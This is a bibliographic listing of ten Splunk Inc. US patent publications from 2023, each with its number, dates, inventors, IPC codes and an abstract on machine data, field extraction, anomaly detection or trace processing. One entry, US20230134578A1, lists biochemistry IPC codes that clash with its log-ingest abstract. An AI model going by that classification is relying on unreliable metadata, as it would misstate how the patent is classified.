公开(公告)号：US20230161821A1

公开(公告)日：2023-05-25

申请号：US18151364

申请日：2023-01-06

Applicant: Splunk Inc.

Inventor： Joerg Beringer ,  Isabelle Park ,  Joshua Walters ,  Eric Tschetter ,  Simon Foster Fishel

IPC: G06F16/903 ,  G06F16/28 ,  G06F16/9038

CPC classification number: G06F16/90335 ,  G06F16/287 ,  G06F16/9038

Abstract: Systems and methods are disclosed for processing events having raw machine data associated with a timestamp using one or more pivot identifiers and one or more step identifiers to generate one or more journey instances. Based on the one or more pivot identifier field, the system can relate events that have a common field value for the pivot identifier field. Based on the one or more step identifiers, the system can group the related events into a subset of events. Using the subset of events, the system can build a journey instance.

公开(公告)号：US11657065B2

公开(公告)日：2023-05-23

申请号：US17158880

申请日：2021-01-26

Applicant: SPLUNK INC.

Inventor： Jesse Brandau Miller ,  Katherine Kyle Feeney ,  Yuan Xie ,  Steve Zhang ,  Adam Jamison Oliner ,  Jindrich Dinga ,  Jacob Leverich

IPC: G06F16/26

CPC classification number: G06F16/26

Abstract: Systems and methods include causing presentation of a first cluster in association with an event of the first cluster, the first cluster from a first set of clusters of events. Each event includes a time stamp and event data. Based on the presentation of the first cluster, an extraction rule corresponding to the event of the first cluster is received from a user. Similarities in the event data between the events are determined based on the received extraction rule. The events are grouped into a second set of clusters based on the determined similarities. Presentation is caused of a second cluster in association with an event of the second cluster, where the second cluster is from the second set of clusters.

公开(公告)号：US11651149B1

公开(公告)日：2023-05-16

申请号：US17874046

申请日：2022-07-26

Applicant: SPLUNK Inc.

Inventor： Jesse Miller ,  Micah James Delfino ,  Marc Robichaud ,  David Carasso

IPC: G06F3/048 ,  G06F40/174 ,  G06F16/2458

CPC classification number: G06F40/174 ,  G06F16/2477

Abstract: The technology disclosed relates to formulating and refining field extraction rules that are used at query time on raw data with a late-binding schema. The field extraction rules identify portions of the raw data, as well as their data types and hierarchical relationships. These extraction rules are executed against very large data sets not organized into relational structures that have not been processed by standard extraction or transformation methods. By using sample events, a focus on primary and secondary example events help formulate either a single extraction rule spanning multiple data formats, or multiple rules directed to distinct formats. Selection tools mark up the example events to indicate positive examples for the extraction rules, and to identify negative examples to avoid mistaken value selection. The extraction rules can be saved for query-time use, and can be incorporated into a data model for sets and subsets of event data.

公开(公告)号：US20230139000A1

公开(公告)日：2023-05-04

申请号：US17515328

申请日：2021-10-29

Applicant: Splunk Inc.

Inventor： James Apger ,  Allison Lindsey Drake ,  James Irwin Ebeling ,  Orville Esoy ,  Bhooshan Kulkarni ,  Marquis L. Montgomery ,  Daniel Trenkner

IPC: G06F21/55 ,  G06F21/57 ,  G06F3/0482

Abstract: A graphical user interface (GUI) for presentation of network security risk and threat information is disclosed. A listing is generated of incidents identified by use of event data obtained from a networked computing environment. A particular incident is determined to be associated with a risk object, wherein a risk object is a component of the networked computing environment. The listing is populated with a name associated with the risk object. Risk events associated with the incident are determined, wherein each risk event contributes to a risk score for the incident. The risk score indicates a potential security issue associated with the risk object. The listing is populated with the risk score and a summary of the events. An action is associated with the listing, for triggering display of additional information associated with the risk object. The listing can be displayed in a first display screen of the GUI.

公开(公告)号：US20230136216A1

公开(公告)日：2023-05-04

申请号：US17515140

申请日：2021-10-29

Applicant: SPLUNK Inc.

Inventor： Sunil Kittinakere Nagesh Koundinya ,  Ramakrishnan Hariharan Chandrasekharapuram ,  Paul Ingram ,  Joseph Ari Ross

IPC: G06F16/2458

Abstract: Described are systems, methods, and techniques for collecting, analyzing, processing, and storing time series data and for evaluating and determining whether and how to include late or delayed data points for inclusion when publishing or storing the time series data. Maximum delay values can identify a duration for waiting for late or delayed data, such as prior to publication. In some examples, maximum delay values can be dynamically adjustable based on a statistical evaluation process. For late or delayed data points that are received after the maximum delay elapses, some data points can be included in the stored time series data, such as if they are received in the same order that they are generated.

公开(公告)号：US20230134578A1

公开(公告)日：2023-05-04

申请号：US18078876

申请日：2022-12-09

Applicant: Splunk Inc.

Inventor： Amin Moshgabadi ,  Baibhav Gautam ,  Hema Krishnamurthy Mohan ,  Joshua Vertes

IPC: C12N9/16 ,  C12N9/12 ,  C12N9/10 ,  A61K39/245 ,  C12N7/00

Abstract: An improved data intake and query system that can perform and display ingest-time and search-time field extraction, redaction, copy, and/or categorization is described herein. As described herein, ingest-time field extraction, redaction, copy, and/or categorization may refer to field or field value extraction, redaction, copy, and/or categorization that is performed by a log observer system of the data intake and query system on raw machine data as the raw machine data is ingested or received from a publisher. As described herein, search-time field extraction, redaction, copy, and/or categorization may refer to field or field value extraction, redaction, copy, and/or categorization that is performed by the log observer system and/or other components of the improved data intake and query system on historical raw machine data that has already been ingested and indexed by the improved data intake and query system.

公开(公告)号：US11636311B2

公开(公告)日：2023-04-25

申请号：US16692144

申请日：2019-11-22

Applicant: SPLUNK INC.

Inventor： Adam Oliner ,  Zidong Yang ,  Sinduja Sreshta

IPC: G06N3/04 ,  G06Q10/0637 ,  G06F16/2453 ,  G06F40/274

Abstract: Described herein is a technology that facilitates the production of and the use of automated datagens for event-based systems. A datagen (i.e., data-generator or data generation system) is a component, module, or subsystem of computer systems that searches, monitors, and analyzes machine data. Existing datagens are not capable of detecting an anomaly in machine data. An anomaly is a variance in the input data stream that exceeds some acceptable amount of deviation from the norm (i.e., standard, expectation, etc.). An embodiment of datagen, in accordance with the technology described herein, detects anomalies in the input machine data.

公开(公告)号：US11632383B2

公开(公告)日：2023-04-18

申请号：US17075928

申请日：2020-10-21

Applicant: SPLUNK INC.

Inventor： Adam Jamison Oliner ,  Jonathan La ,  Colleen Kinross ,  Hongyang Zhang ,  Jacob Leverich ,  Shang Cai ,  Mihai Ganea ,  Alex Cruise ,  Toufic Boubez ,  Manish Sainani

IPC: G06F21/00 ,  H04L9/40 ,  G06N3/08 ,  G06N5/00 ,  G06N3/04

Abstract: In some implementations, sequences of time series values determined from machine data are obtained. Each sequence corresponds to a respective time series. A plurality of predictive models is generated for a first time series from the sequences of time series values. Each predictive model is to generate predicted values associated with the first time series using values of a second time series. For each of the plurality of predictive models, an error is determined between the corresponding predicted values and values associated with the first time series. A predictive model is selected for anomaly detection based on the determined error of the predictive model. Transmission is caused of an indication of an anomaly detected using the selected predictive model.

公开(公告)号：US11620541B1

公开(公告)日：2023-04-04

申请号：US16656496

申请日：2019-10-17

Applicant: Splunk Inc.

Inventor： Koulick Ghosh ,  George Tsironis

IPC: G06F16/245 ,  G06N5/04 ,  G06N20/00 ,  G06F9/451

Abstract: A custom use case framework in a computer analytics system is shown and described. The custom use case framework includes a custom model creation wizard interface that guides a user through submitting custom model parameters of a custom model definition. The computing system transforms custom model parameters of the custom model definition into a custom model. The custom model is executed in an analytics system. Thus, one or more embodiments provide a simplified method for a user to generate a custom model that is executable by a computer system.

公开(公告)号：US11620164B1

公开(公告)日：2023-04-04

申请号：US17033253

申请日：2020-09-25

Applicant: Splunk Inc.

Inventor： Steven Karis ,  Maxime Petazzoni ,  Matthew William Pound ,  Charles Smith ,  Chengyu Yang

IPC: G06F9/50 ,  G06F9/48 ,  G06F11/34 ,  G06F16/2455 ,  G06F11/36 ,  G06F9/54

Abstract: According to embodiments, a method for virtual partitioning of data includes receiving a data stream comprising a plurality of traces, each trace comprising a plurality of spans from a plurality of users. The method also includes assigning the plurality of traces of the data stream to a plurality of virtual partitions based on each user of the plurality of users, each virtual partition of the plurality of virtual partitions comprising data of a user of the plurality of users. The method also includes scheduling at least a subset of the plurality of virtual partitions to at least one user partition of a shared topic, the at least one user partition comprising data from at least one virtual partition of at least one user of the plurality of users. The method also includes indexing each user partition of the shared topic based on each user and each virtual partition.